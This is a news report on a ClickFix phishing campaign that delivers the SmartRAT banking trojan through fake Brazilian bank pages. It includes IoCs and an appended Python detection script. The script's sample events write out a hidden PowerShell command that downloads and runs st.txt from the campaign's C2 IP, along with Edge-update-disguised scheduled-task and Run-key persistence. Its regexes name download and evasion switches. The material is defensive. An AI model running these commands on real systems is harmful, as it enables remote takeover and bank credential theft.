CyberSecurityNews

Hackers Abuse PowerShell Commands to Deliver SmartRAT Through Brazilian Bank Phishing Page


A new cyberattack campaign has emerged, using cleverly crafted phishing pages and PowerShell tricks to deliver a dangerous piece of malware called SmartRAT.

The attack targets Brazilian banking customers and combines social engineering with AI-generated web pages to make the threat feel disturbingly real.

Researchers say the campaign marks a troubling shift in how attackers build and deploy their tools.

The attackers set up a fake website mimicking a well-known Brazilian bank, complete with a convincing credit card application page and a fake security verification prompt.

Once a visitor interacts with the page, they are pressured into running a malicious PowerShell command, which quietly downloads and installs SmartRAT. The malware can record keystrokes, capture screenshots, intercept QR codes, and display full-screen fake bank forms to steal credentials.

Analysts from Zscaler ThreatLabz, who first spotted this campaign in March 2026, said in a report shared with Cyber Security News (CSN) that the fraudulent page was likely built using an AI-powered website creation tool.

Researchers found telltale signs of AI-generated code in the page source, including templated section comments and automated structuring that are common outputs from these tools.

What makes this campaign especially dangerous is how it layers multiple deception techniques on top of one another.

AI-generated ClickFix campaign attack chain (Source – Zscaler)

The phishing page first shows a fake Cloudflare CAPTCHA, then triggers a fake Blue Screen of Death to panic victims into following instructions.

This technique, known as ClickFix, convinces victims their system has crashed and that running a specific command is the only way to recover.

Fake website impersonating a Brazilian bank using a ClickFix lure (Source - Zscaler)

SmartRAT itself is a fully featured remote access tool written entirely in PowerShell, with a deep reach into any system it infects. It monitors browser windows for banking activity and alerts its operator the moment a victim opens a financial app or website.

The attacker can then take over the screen, inject keystrokes, block victim input, and steal whatever data is entered.

Hackers Abuse PowerShell Commands

The infection begins when a victim pastes a PowerShell command into the Windows Run dialog, unaware it was silently planted in their clipboard by the malicious page.

That command connects to a remote server at 64.95.13.238 and pulls down a file called st.txt, which acts as a hidden dropper.

The dropper fetches a second file, payload.php, containing an AES-encrypted PowerShell script that unpacks and executes SmartRAT.

SmartRAT hides itself by disguising its files and scheduled tasks under Microsoft Edge update names, blending in with legitimate Windows processes.

Fake BSOD message used to convince a victim into executing malicious PowerShell commands (Source - Zscaler)

It attempts to escalate privileges by prompting for UAC approval and, if granted, installs itself as a Windows service running with SYSTEM-level access.

Even if the user denies that request, SmartRAT persists through a hidden PowerShell process and a registry-based startup entry.

AI-Built Infrastructure and a Critically Flawed C2 Panel

One striking discovery is that the attackers also used AI tools to build their command-and-control panel, a web interface used to manage infected machines.

Researchers found the panel’s login system was entirely client-side, meaning anyone could bypass it by simply setting two values in the browser’s local storage.

This basic security gap points to code written without proper review, a likely result of rushed, AI-assisted development.

The C2 panel, branded as MyGood PRO, gives operators a live dashboard of connected victims along with real-time command capabilities.

SmartRAT C2 panel administration page (Source - Zscaler)

Operators can stream a victim’s screen, swap QR codes on banking pages to redirect payment transactions, and inject fake bank verification forms to harvest passwords.

The platform targets more than a dozen Brazilian banks and payment services, showing this is a targeted and well-resourced operation.

To stay protected, users should be cautious of any website asking them to paste commands into their computer, even when the page looks like a legitimate bank or security prompt.

Organizations should monitor for unusual PowerShell execution, unexpected scheduled tasks, and outbound connections to unknown IP addresses. Endpoint protection tools that flag script-based threats remain a critical line of defense against attacks like SmartRAT.

Indicators of Compromise (IoCs):

Type        Indicator                          Description
----------  ---------------------------------  ------------------------------------------------
Domain      crefisa[.]online                   Fraudulent phishing domain
Domain      vfsgloball[.]net                   Fraudulent phishing domain
Domain      cartaobb[.]com                     Fraudulent domain impersonating Brazilian bank
Domain      windowsupdate-cdn[.]com            SmartRAT C2 domain
IP Address  64[.]95[.]13[.]238                 C2 IP address used for payload delivery
IP Address  162[.]141[.]111[.]227              Fallback C2 IP address
MD5 Hash    297eb45f028d44d750297d2f932b9c91   st.txt (PowerShell dropper)
MD5 Hash    6bf4d4c62b5138ace281ce3d08297787   payload.php (encrypted loader)
MD5 Hash    3c72e1f37f115b00c3ad6ed31bacfe8a   PowerShell RAT (SmartRAT)
MD5 Hash    b17ccdb5531555e43f082d6e77c07227   PowerShell RAT (SmartRAT variant)

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
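The monitoring advice above (unusual PowerShell execution, Edge-update-named scheduled tasks, registry startup entries, contact with the listed IPs and domains) and the defanging note can be turned into a small triage script. The following is an added example written for this article, not code from Zscaler or CSN: it refangs the network IoCs from the table, runs a few behaviour rules over constructed, Sysmon-style JSON events, and defangs any matched indicator again before reporting. The rule names, the event field names (RecordId, ParentImage, Image, CommandLine, TargetObject, Details, DestinationIp) and every sample event are assumptions made for the example; only the IP and domain values come from the article.

```python
import json
import re

# Defanged network IoCs copied from the article's table (domains and IPs only).
DEFANGED_IOCS = [
    "crefisa[.]online", "vfsgloball[.]net", "cartaobb[.]com",
    "windowsupdate-cdn[.]com", "64[.]95[.]13[.]238", "162[.]141[.]111[.]227",
]


def refang(indicator):
    """Reverse common defanging so an IoC can be matched against raw telemetry."""
    return (indicator.replace("[.]", ".").replace("[:]", ":")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def defang(indicator):
    """Defang an indicator for reports so it cannot be clicked or auto-resolved."""
    return indicator.replace(".", "[.]")


IOC_SET = {refang(i) for i in DEFANGED_IOCS}

# Behaviour patterns mirroring the article's description; the exact regexes are assumptions.
POWERSHELL_RE = re.compile(r"powershell|pwsh", re.I)
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|downloadstring|downloadfile|"
    r"net\.webclient|\biex\b|invoke-expression", re.I)
EVASION_RE = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-e(p|xecutionpolicy)\s+bypass|-nop\b", re.I)
EDGE_UPDATE_RE = re.compile(r"microsoft\s*edge\s*update|edgeupdate", re.I)
TASK_CREATE_RE = re.compile(r"schtasks(\.exe)?\s+.*?/create|register-scheduledtask", re.I)
RUN_KEY_RE = re.compile(r"\\currentversion\\run\b", re.I)


def find_iocs(text):
    """Return every refanged IoC that appears anywhere in the given text."""
    lowered = text.lower()
    return sorted(i for i in IOC_SET if i in lowered)


def evaluate(event):
    """Return the names of the rules that fire for one event (empty list if none)."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    hits = []
    # ClickFix: the Run dialog is hosted by explorer.exe, so a PowerShell child of explorer
    # that downloads or hides itself is the shape of the paste-this-command lure.
    if (POWERSHELL_RE.search(image) and parent.endswith("explorer.exe")
            and (DOWNLOAD_RE.search(cmd) or EVASION_RE.search(cmd))):
        hits.append("clickfix_powershell_from_explorer")
    # Any field (command line, destination IP or hostname) that names a known IoC.
    if find_iocs(json.dumps(event)):
        hits.append("known_ioc_contact")
    # A scheduled task named like an Edge update whose action is PowerShell.
    if TASK_CREATE_RE.search(cmd) and EDGE_UPDATE_RE.search(cmd) and POWERSHELL_RE.search(cmd):
        hits.append("edge_update_masquerade_task")
    # A Run-key value that launches PowerShell (the fallback persistence when UAC is denied).
    if RUN_KEY_RE.search(event.get("TargetObject", "")) and POWERSHELL_RE.search(event.get("Details", "")):
        hits.append("run_key_powershell_persistence")
    return hits


def scan(jsonl):
    """Run every rule over newline-delimited JSON events; return only events that fired."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        rules = evaluate(event)
        if rules:
            findings.append({"RecordId": event["RecordId"], "rules": rules,
                             "iocs": [defang(i) for i in find_iocs(json.dumps(event))]})
    return findings


# Constructed sample telemetry (not real logs). Records 2 and 6 are benign controls.
SAMPLE_EVENTS = r"""
{"RecordId": 1, "EventType": "ProcessCreate", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"iwr http://64.95.13.238/st.txt | iex\""}
{"RecordId": 2, "EventType": "ProcessCreate", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -NoProfile -Command Get-Date"}
{"RecordId": 3, "EventType": "ProcessCreate", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /create /tn \"MicrosoftEdgeUpdateTaskMachineCore\" /tr \"powershell -w hidden -File C:\\ProgramData\\EdgeUpdate\\core.ps1\" /sc onlogon"}
{"RecordId": 4, "EventType": "RegistryValueSet", "TargetObject": "HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\EdgeUpdate", "Details": "powershell.exe -w hidden -File C:\\Users\\victim\\AppData\\Roaming\\EdgeUpdate\\svc.ps1"}
{"RecordId": 5, "EventType": "NetworkConnect", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "162.141.111.227", "DestinationPort": 443}
{"RecordId": 6, "EventType": "NetworkConnect", "Image": "C:\\Program Files\\Microsoft\\Edge\\msedge.exe", "DestinationHostname": "update.example.com", "DestinationPort": 443}
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The script keeps IoCs refanged only in memory and defangs them again in its output, which is the pattern the note above asks for. Against the constructed events it flags records 1, 3, 4 and 5 and stays silent on the two benign controls; the rules are deliberately narrow (explorer.exe parent plus a download or hiding switch, task name plus PowerShell action) to avoid paging on every administrator script.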
